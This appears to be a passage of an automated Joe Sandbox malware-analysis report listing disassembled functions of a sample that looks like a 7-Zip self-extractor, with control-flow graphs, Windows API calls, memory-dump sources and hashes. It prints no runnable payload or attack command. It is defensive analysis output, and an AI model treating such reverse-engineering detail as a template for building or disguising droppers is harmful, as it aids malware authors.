                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlenmemcmp$memmove
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3251180759-0
                                                                                                                                                                • Opcode ID: 6bc55519efb0b0d7bcd01b07c395372ad45836126fbb7a8d58e6edc0d1d2ad79
                                                                                                                                                                • Instruction ID: 79ec95c0005fca4e8b411a1d1c8c43267f3aca6e0e8108953f5cc2358a2b563c
                                                                                                                                                                • Opcode Fuzzy Hash: 6bc55519efb0b0d7bcd01b07c395372ad45836126fbb7a8d58e6edc0d1d2ad79
                                                                                                                                                                • Instruction Fuzzy Hash: 9B417072D0120AAFCF01DFA4C9849EEBFB9EF48384F0444AAE805B3245D3759E85DB55

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1307 4019d2-4019e9 ??2@YAPAXI@Z 1308 4019f4 1307->1308 1309 4019eb-4019f2 call 41616a 1307->1309 1311 4019f6-401a1f call 41334e call 412a6a 1308->1311 1309->1311 1317 401a90 1311->1317 1318 401a21-401a2b ??2@YAPAXI@Z 1311->1318 1319 401a93-401aaa call 409606 1317->1319 1320 401a46 1318->1320 1321 401a2d-401a44 1318->1321 1326 401aab-401ab0 1319->1326 1323 401a48-401a5f call 40113f 1320->1323 1321->1323 1323->1319 1330 401a61-401a6b 1323->1330 1328 401ab2-401ab4 1326->1328 1329 401ab8-401aba 1326->1329 1328->1329 1331 401ac2-401ac7 1329->1331 1332 401abc-401abe 1329->1332 1333 401a79-401a83 ??2@YAPAXI@Z 1330->1333 1334 401a6d-401a6f call 4039e7 1330->1334 1336 401afc-401b00 1331->1336 1332->1331 1337 401a85-401a8e call 4016d4 1333->1337 1338 401ac9 1333->1338 1339 401a74-401a77 1334->1339 1340 401acb-401adc call 4015d8 call 401880 1337->1340 1338->1340 1339->1326 1339->1333 1346 401ae1-401ae8 1340->1346 1347 401af0-401af2 1346->1347 1348 401aea-401aec 1346->1348 1349 401af4-401af6 1347->1349 1350 401afa 1347->1350 1348->1347 1349->1350 1350->1336
                                                                                                                                                                APIs
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,0041E9E8,ExecuteFile,00000028,00000028,?,00406D79,?,0041E9E8,0041E9E8), ref: 004019DF
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00401A23
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000044), ref: 00401A7B
                                                                                                                                                                  • Part of subcall function 00409606: wvsprintfW.USER32(?,00000000,?), ref: 0040962A
                                                                                                                                                                  • Part of subcall function 00409606: GetLastError.KERNEL32 ref: 0040963B
                                                                                                                                                                  • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
                                                                                                                                                                  • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
                                                                                                                                                                  • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 0040968B
                                                                                                                                                                  • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 00409692
                                                                                                                                                                  • Part of subcall function 00409606: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096A7
                                                                                                                                                                  • Part of subcall function 00409606: lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
                                                                                                                                                                  • Part of subcall function 00409606: lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
                                                                                                                                                                  • Part of subcall function 00409606: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 004096D7
                                                                                                                                                                  • Part of subcall function 00409606: LocalFree.KERNEL32(?), ref: 004096E1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@$FormatMessagelstrcpylstrlen$??3@ErrorFreeLastLocalwvsprintf
                                                                                                                                                                • String ID: ExecuteFile
                                                                                                                                                                • API String ID: 1592922708-323923146
                                                                                                                                                                • Opcode ID: 9ac5554e1c21d9026da9657adf3441f6da01eba3c8fc77f1622ea7b0805a4649
                                                                                                                                                                • Instruction ID: c177ff4ec49e1bf3251047196a645ec591425be599670d09217b52daf662347d
                                                                                                                                                                • Opcode Fuzzy Hash: 9ac5554e1c21d9026da9657adf3441f6da01eba3c8fc77f1622ea7b0805a4649
                                                                                                                                                                • Instruction Fuzzy Hash: 3D31A075701204BFCB10DBA6CC85DAF77A9EF85314724486FF405EB2A1DA789D80CB69

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1352 401880-4018d6 call 4136b9 call 401403 call 401795 CreateThread 1359 4018d8 call 408caa 1352->1359 1360 4018dd-4018f8 WaitForSingleObject 1352->1360 1359->1360 1361 4018fa-4018fd 1360->1361 1362 40192c-401932 1360->1362 1364 401920 1361->1364 1365 4018ff-401902 1361->1365 1366 401990 1362->1366 1367 401934-401949 GetExitCodeThread 1362->1367 1370 401922-40192a call 409606 1364->1370 1368 401904-401907 1365->1368 1369 40191c-40191e 1365->1369 1371 401995-401998 1366->1371 1372 401953-40195e 1367->1372 1373 40194b-40194d 1367->1373 1376 401918-40191a 1368->1376 1377 401909-40190c 1368->1377 1369->1370 1370->1366 1374 401960-401961 1372->1374 1375 401966-40196f 1372->1375 1373->1372 1379 40194f-401951 1373->1379 1380 401963-401964 1374->1380 1381 401971-401978 1375->1381 1382 40197a-401986 SetLastError 1375->1382 1376->1370 1383 401913-401916 1377->1383 1384 40190e-401911 1377->1384 1379->1371 1386 401988-40198d call 409606 1380->1386 1381->1366 1381->1382 1382->1386 1383->1380 1384->1366 1384->1383 1386->1366
                                                                                                                                                                APIs
                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,0040133C,00000000,00000000,?), ref: 004018C4
                                                                                                                                                                • WaitForSingleObject.KERNEL32(000000FF,?,00401AE1,?,?), ref: 004018E5
                                                                                                                                                                  • Part of subcall function 00409606: wvsprintfW.USER32(?,00000000,?), ref: 0040962A
                                                                                                                                                                  • Part of subcall function 00409606: GetLastError.KERNEL32 ref: 0040963B
                                                                                                                                                                  • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
                                                                                                                                                                  • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
                                                                                                                                                                  • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 0040968B
                                                                                                                                                                  • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 00409692
                                                                                                                                                                  • Part of subcall function 00409606: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096A7
                                                                                                                                                                  • Part of subcall function 00409606: lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
                                                                                                                                                                  • Part of subcall function 00409606: lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
                                                                                                                                                                  • Part of subcall function 00409606: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 004096D7
                                                                                                                                                                  • Part of subcall function 00409606: LocalFree.KERNEL32(?), ref: 004096E1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 359084233-0
                                                                                                                                                                • Opcode ID: 319690abfe6fd779aaf84523b8fe0746c993e0633f498ebd4a0fa4e94ee787c6
                                                                                                                                                                • Instruction ID: 75a92c2673557d9aa231ca5611e15780e437056db76e39d6c0de200791827833
                                                                                                                                                                • Opcode Fuzzy Hash: 319690abfe6fd779aaf84523b8fe0746c993e0633f498ebd4a0fa4e94ee787c6
                                                                                                                                                                • Instruction Fuzzy Hash: 143124F5640200BAEB315B16DC55ABB3769EB84350F24813BF905FA2F0C6788981D72E

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1389 414dcf-414e17 _EH_prolog call 41334e 1392 414e19-414e1c 1389->1392 1393 414e1f-414e22 1389->1393 1392->1393 1394 414e24-414e29 1393->1394 1395 414e38-414e5d 1393->1395 1396 414e31-414e33 1394->1396 1397 414e2b-414e2d 1394->1397 1398 414e5f-414e65 1395->1398 1399 4152ea-4152fb 1396->1399 1397->1396 1400 414e6b-414e6f 1398->1400 1401 414f2f-414f42 call 40122a 1398->1401 1402 414e71-414e74 1400->1402 1403 414e77-414e86 1400->1403 1409 414f44-414f54 call 414b2d 1401->1409 1410 414f59-414f7e call 414333 ??2@YAPAXI@Z 1401->1410 1402->1403 1405 414e88-414e9e call 414be8 call 414da5 call 412885 1403->1405 1406 414eab-414eb0 1403->1406 1425 414ea3-414ea9 1405->1425 1407 414eb2-414ebc 1406->1407 1408 414ebe-414ef8 call 414be8 call 414da5 call 412885 call 414cbf 1406->1408 1407->1408 1412 414efb-414f11 1407->1412 1408->1412 1409->1399 1423 414f80-414f87 call 4137b3 1410->1423 1424 414f89-414fa2 call 41334e call 4136e0 1410->1424 1420 414f14-414f1c 1412->1420 1420->1425 1426 414f1e-414f2d call 414b0b 1420->1426 1423->1424 1442 414fa5-414fc8 call 4136ae 1424->1442 1425->1398 1426->1420 1446 414fca-414fcf 1442->1446 1447 414ffe-415001 1442->1447 1450 414fd1-414fd3 1446->1450 1451 414fd7-414fef call 414c38 call 414b2d 1446->1451 1448 415003-415008 1447->1448 1449 41502d-415051 ??2@YAPAXI@Z 1447->1449 1452 415010-415026 call 414c38 call 414b2d 1448->1452 1453 41500a-41500c 1448->1453 1454 415053-41505a call 415346 1449->1454 1455 41505c 1449->1455 1450->1451 1468 414ff1-414ff3 1451->1468 1469 414ff7-414ff9 1451->1469 1452->1449 1453->1452 1460 41505e-415075 call 41334e 1454->1460 1455->1460 1470 415083-4150a8 call 4156e6 1460->1470 1471 415077-415080 1460->1471 1468->1469 1469->1399 1475 4150eb-4150ee 1470->1475 1476 4150aa-4150af 1470->1476 1471->1470 1477 4152a5-4152aa 1475->1477 1478 4150f4-415132 call 414d0b call 414bb9 1475->1478 1479 4150b1-4150b3 1476->1479 1480 4150b7-4150bc 1476->1480 1482 4152b2-4152d6 1477->1482 1483 4152ac-4152ad 1477->1483 1493 415145-415175 call 414491 1478->1493 1494 415134-415142 1478->1494 1479->1480 1484 4150c4-4150dc call 414c38 call 414b2d 1480->1484 1485 4150be-4150c0 1480->1485 1482->1399 1482->1442 1483->1482 1495 4150e4-4150e6 1484->1495 1496 4150de-4150e0 1484->1496 1485->1484 1498 41517a-41517f 1493->1498 1494->1493 1495->1399 1496->1495 1499 415181 1498->1499 1500 4151cc-4151d2 1498->1500 1501 415184-415186 1499->1501 1502 4151d4-4151d6 1500->1502 1503 4151e9-4151eb 1500->1503 1504 4151d9-4151e5 call 415693 1501->1504 1502->1504 1505 4151f2-4151fe 1503->1505 1506 4151ed-4151f0 1503->1506 1508 415188-41518a 1504->1508 1517 4151e7 1504->1517 1505->1501 1509 415200-415209 1505->1509 1506->1508 1510 415192-415194 1508->1510 1511 41518c-41518d 1508->1511 1513 415211-415213 1509->1513 1514 41520b-41520d 1509->1514 1515 415196-415198 1510->1515 1516 41519c-41519e 1510->1516 1511->1510 1513->1482 1518 415219-41521f 1513->1518 1514->1513 1515->1516 1516->1484 1519 4151a4-4151aa 1516->1519 1522 4151b3-4151b5 1517->1522 1523 4151b9-4151bb 1517->1523 1518->1477 1518->1482 1519->1484 1522->1523 1525 4151c3-4151c7 1523->1525 1526 4151bd-4151bf 1523->1526 1525->1482 1526->1525
                                                                                                                                                                APIs
                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00414DD8
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 00414F76
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000038,00000000,00000001), ref: 00415049
                                                                                                                                                                  • Part of subcall function 00415346: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,0041505A,00000000,00000001), ref: 0041536E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@$H_prolog
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3431946709-0
                                                                                                                                                                • Opcode ID: 04c58f70b3ae3af4a81f86ac04d094f81de620dd4ea7d6dbb38bc93096a2a0a8
                                                                                                                                                                • Instruction ID: 05c66da844a657c6192dd0360cb768692f443836589bcaaccfb39479f9247554
                                                                                                                                                                • Opcode Fuzzy Hash: 04c58f70b3ae3af4a81f86ac04d094f81de620dd4ea7d6dbb38bc93096a2a0a8
                                                                                                                                                                • Instruction Fuzzy Hash: 5AF12871600609DFCB14DF69C884AEE7BB4BF88314F14415AF8199B351DB39ED82CB98
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00402665: LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 00402675
                                                                                                                                                                  • Part of subcall function 00402665: GetProcAddress.KERNEL32(00000000), ref: 0040267C
                                                                                                                                                                  • Part of subcall function 00402665: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 0040268A
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(0040618A,?,?,?,?,?,?,?,0040618A), ref: 00404117
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,0040618A,?,?,?,?,?,?,?,0040618A), ref: 0040411F
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,0040618A,?,?,?,?,?,?,?,0040618A), ref: 00404127
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$AddressInfoLibraryLoadNativeProcSystem
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1642057587-0
                                                                                                                                                                • Opcode ID: 8baa72d996272d38ed05c446b7b0ed8a988b778acb04223dc58cbd51a4d46b7c
                                                                                                                                                                • Instruction ID: 9e508ec73b50e54c44e6a1cbebbe2d332481b03b5bec8f58460c8bd0d041dc66
                                                                                                                                                                • Opcode Fuzzy Hash: 8baa72d996272d38ed05c446b7b0ed8a988b778acb04223dc58cbd51a4d46b7c
                                                                                                                                                                • Instruction Fuzzy Hash: 9B515AB2D00109AACF01EFD1CD859FEBB7AAF48308F04442AF611B21D1D7799A4ADB59
                                                                                                                                                                APIs
                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00415EEF
                                                                                                                                                                  • Part of subcall function 00418390: _EH_prolog.MSVCRT ref: 00418395
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00415F9F
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00415FDE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@H_prolog
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1329742358-0
                                                                                                                                                                • Opcode ID: 489a3c7cee778f4efcc6a7dc722babe966adbbc4dc412f5c71f799eb8d0ccc08
                                                                                                                                                                • Instruction ID: ee2028b182a3def668edec6c1c55fa530388cf6d31d76bb4d9d5585ab1c54ad5
                                                                                                                                                                • Opcode Fuzzy Hash: 489a3c7cee778f4efcc6a7dc722babe966adbbc4dc412f5c71f799eb8d0ccc08
                                                                                                                                                                • Instruction Fuzzy Hash: 3C414E3160020ADFCB11DFA5C895AEEBBB8EF84304F14446EF406A7251DB79AD86CB15
                                                                                                                                                                APIs
                                                                                                                                                                • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 004029E9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                                                                • String ID: @
                                                                                                                                                                • API String ID: 1890195054-2766056989
                                                                                                                                                                • Opcode ID: 59fdda50a6964837229ca20d0fc0b21477a5b75227e6593dad09989c17fceb1e
                                                                                                                                                                • Instruction ID: ac6f2177cda35d3747c738f0166e8eeafa9c669c636109ee84ed785ee5894a61
                                                                                                                                                                • Opcode Fuzzy Hash: 59fdda50a6964837229ca20d0fc0b21477a5b75227e6593dad09989c17fceb1e
                                                                                                                                                                • Instruction Fuzzy Hash: 05F0C8B1B242049ADF71A775DA4DB9E77E4BB04358F10453BD402F61C1EBB8D8448A0D
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00416224: _CxxThrowException.MSVCRT(?,0041C8F8), ref: 0041623E
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0041C40C,?,?,?,0041BE90), ref: 0041821D
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0041C40C,?,?,?,0041BE90), ref: 00418381
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$ExceptionThrow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2803161813-0
                                                                                                                                                                • Opcode ID: e10bf944ff68911ba707479cc8ffbf2420e48e5b65e3bf21be0fe4843cdedc08
                                                                                                                                                                • Instruction ID: 83b4708bc2a3ecc906b18b476579f0d6f6f5e7f9de80452c7b562753e21decce
                                                                                                                                                                • Opcode Fuzzy Hash: e10bf944ff68911ba707479cc8ffbf2420e48e5b65e3bf21be0fe4843cdedc08
                                                                                                                                                                • Instruction Fuzzy Hash: 50815831A00609AFCB24DFA5C891AEEBBF1FF08314F14456EE955A3351DB39A981CB58
                                                                                                                                                                APIs
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011D7
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011FD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@??3@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1936579350-0
                                                                                                                                                                • Opcode ID: 68d18e978562b686aa57d02b5185ded876e64a512ac0e82d18ed9b6a0d6aac65
                                                                                                                                                                • Instruction ID: 4976e3025a107b63499e13e7bd885c103cda5e9e62e117b5f23361b6eed5d2a5
                                                                                                                                                                • Opcode Fuzzy Hash: 68d18e978562b686aa57d02b5185ded876e64a512ac0e82d18ed9b6a0d6aac65
                                                                                                                                                                • Instruction Fuzzy Hash: 65F08C36210611ABC324DF6DC59186BB3E4FB88351720883FE6DBD72A1DA35A8918754
                                                                                                                                                                APIs
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00402B46,00000001,?,00403119,00000000,00000000,00000000), ref: 00402815
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00402B46,00000001,?,00403119,00000000,00000000,00000000), ref: 00402839
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@??3@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1936579350-0
                                                                                                                                                                • Opcode ID: 2064f16d128cdefb72a915ff298af5a2bfcd9ac95c91b2f18fb6f0bffc5949de
                                                                                                                                                                • Instruction ID: bcdea4c81718d913e52e4f2a3d02f3e10d2d0235028ef0e1c46e76d630642e7e
                                                                                                                                                                • Opcode Fuzzy Hash: 2064f16d128cdefb72a915ff298af5a2bfcd9ac95c91b2f18fb6f0bffc5949de
                                                                                                                                                                • Instruction Fuzzy Hash: 9AF0903A0046419FC330AF2AC594843FBE8EB59714720CD7FE1D6D36A2C674A880C764
                                                                                                                                                                APIs
                                                                                                                                                                • SetFilePointer.KERNELBASE(?,?,?,?), ref: 00412320
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 0041232E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                • Opcode ID: 7ccaebcf3ae4d329a8be65b6a742600eba4963c05187a2ee435572f36bdccfb6
                                                                                                                                                                • Instruction ID: 65ff4e97a72b45656fb33b06e3671964329e584f013e41466ec28955d6667f50
                                                                                                                                                                • Opcode Fuzzy Hash: 7ccaebcf3ae4d329a8be65b6a742600eba4963c05187a2ee435572f36bdccfb6
                                                                                                                                                                • Instruction Fuzzy Hash: B7F0B7B4900208EF8B05CFA4D9448EE7BB5EB49310B208599F815D7350D7759A60DB65
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 004134D2
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 004134F1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
